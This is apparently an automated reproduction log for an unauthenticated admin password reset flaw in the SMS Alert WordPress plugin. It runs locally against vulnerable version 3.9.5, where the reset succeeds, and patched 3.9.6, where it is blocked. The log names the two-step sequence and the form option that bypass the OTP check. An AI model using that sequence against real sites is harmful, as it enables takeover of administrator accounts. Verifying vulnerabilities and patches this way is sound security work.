============================================
CVE-2026-11387 Reproduction
SMS Alert <= 3.9.5 — Unauthenticated Password Reset
============================================
Start: 2026-07-05T10:47:11Z
[*] Checking and installing dependencies...
[+] PHP and MariaDB installed
[+] wp-cli available: WP-CLI 2.12.0
[*] Starting MariaDB...
mysqld is alive
mysqld is alive
[+] MariaDB is running
[+] Database 'wordpress' ready
[+] Plugin zips ready: -rw-r--r-- 1 vscode vscode 1011803 Jul 5 10:41 /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/sms-alert-3.9.5.zip
-rw-r--r-- 1 vscode vscode 1011957 Jul 5 10:42 /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/sms-alert-3.9.6.zip
[+] WordPress downloaded at /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/artifacts/wordpress
[*] Configuring WordPress...
Success: Generated 'wp-config.php' file.
WordPress is already installed.
[+] WordPress installed
[+] WooCommerce active
[+] PHP server running on http://localhost:8080 (PID=107794)
============================================
PHASE A: Exploit against VULNERABLE 3.9.5
============================================
[*] Setting up SMS Alert 3.9.5...
Plugin 'sms-alert' deactivated.
Success: Deactivated 1 of 1 plugins.
Deleted 'sms-alert' plugin.
Success: Deleted 1 of 1 plugins.
Plugin 'sms-alert' activated.
Success: Installed 1 of 1 plugins.
Success: Value passed for 'smsalert_gateway' option is unchanged.
Success: Value passed for 'smsalert_general' option is unchanged.
Success: Value passed for custom field 'billing_phone' is unchanged.
Success: Updated user 1.
[+] SMS Alert 3.9.5 configured (gateway creds set, reset_password=on, admin phone=919999990001)
[*] Pre-exploit: admin password 'admin_original_123' check → OK
[*] Step 1: Triggering OTP challenge for admin phone (919999990001)...
HTTP 200
Session cookie: PHPSESSID=0f1b1609febe3cdbd361787ba27399f5
[*] Step 2: Submitting password change (option=smsalert-change-password-form)...
HTTP 302
Location: http://localhost:8080/?page_id=8&password-reset=true
[*] Post-exploit verification:
New password 'Pwned!Pass42' → OK (expected: OK)
Old password 'admin_original_123' → FAIL (expected: FAIL)
[+] VULNERABLE 3.9.5: Exploit SUCCEEDED — admin password reset without OTP!
============================================
PHASE B: Exploit against PATCHED 3.9.6
============================================
[*] Setting up SMS Alert 3.9.6...
Plugin 'sms-alert' deactivated.
Success: Deactivated 1 of 1 plugins.
Deleted 'sms-alert' plugin.
Success: Deleted 1 of 1 plugins.
Plugin 'sms-alert' activated.
Success: Installed 1 of 1 plugins.
Success: Value passed for 'smsalert_gateway' option is unchanged.
Success: Value passed for 'smsalert_general' option is unchanged.
Success: Value passed for custom field 'billing_phone' is unchanged.
Success: Updated user 1.
[+] SMS Alert 3.9.6 configured (gateway creds set, reset_password=on, admin phone=919999990001)
[*] Pre-exploit: admin password 'admin_original_123' check → OK
[*] Step 1: Triggering OTP challenge for admin phone...
Validate OTP (One Time Passcode)
[*] Step 2: Submitting password change attempt...
HTTP 200
(no redirect — attack blocked)
[*] Post-exploit verification:
Hacked password 'HackedPass99' → FAIL (expected: FAIL)
Original password 'admin_original_123' → OK (expected: OK)
[+] PATCHED 3.9.6: Attack BLOCKED — password not changed, original still works!
[*] Cleaning up...
[+] Server stopped
[+] Runtime manifest written to /data/pruva/runs/498d96fe-ed8a-4880-84f4-e061ac3467bf/bundle/repro/runtime_manifest.json
============================================
FINAL VERDICT
============================================
Vulnerable 3.9.5 exploit success : true
Patched 3.9.6 attack blocked : true
End: 2026-07-05T10:47:31Z
[+] CVE-2026-11387 REPRODUCED SUCCESSFULLY